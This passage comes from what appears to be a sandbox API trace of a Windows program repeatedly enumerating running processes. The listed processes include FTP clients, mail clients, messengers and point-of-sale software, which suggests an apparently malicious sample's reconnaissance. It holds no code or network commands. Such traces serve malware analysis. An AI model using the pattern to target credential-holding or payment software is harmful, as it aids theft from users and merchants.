szExeFile="RuntimeBroker.exe")) returned 1 [0275.440] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.442] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0275.444] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0275.445] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0275.447] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0275.448] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.453] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0275.455] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0275.457] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0275.458] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0275.460] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0275.462] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0275.464] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0275.469] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0275.471] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0275.473] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0275.475] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0275.476] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0275.478] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0275.479] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0275.536] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0275.538] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0275.540] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0275.541] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0275.543] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0275.544] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0275.548] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0275.549] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0275.551] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0275.552] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0275.553] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0275.555] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0275.556] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0275.558] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0275.562] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0275.564] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0275.565] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0275.567] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0275.569] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0275.571] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0275.573] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0275.624] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0275.626] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0275.628] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0275.629] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0275.631] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0275.633] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0275.634] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0275.636] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0275.641] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0275.642] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0275.644] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0275.646] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0275.647] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0275.649] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0275.651] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0275.655] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0275.657] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0275.659] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0275.660] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0275.662] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0275.663] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0275.665] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0275.667] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0275.739] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0275.741] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0275.743] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0275.746] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0275.751] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0275.753] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0275.755] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0275.757] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0275.759] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0275.761] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0275.766] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0275.769] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0275.770] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0275.772] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0275.773] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0275.775] CloseHandle (hObject=0x758) returned 1 [0275.775] Sleep (dwMilliseconds=0x64) [0275.909] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0275.922] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.924] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0275.925] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0275.926] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 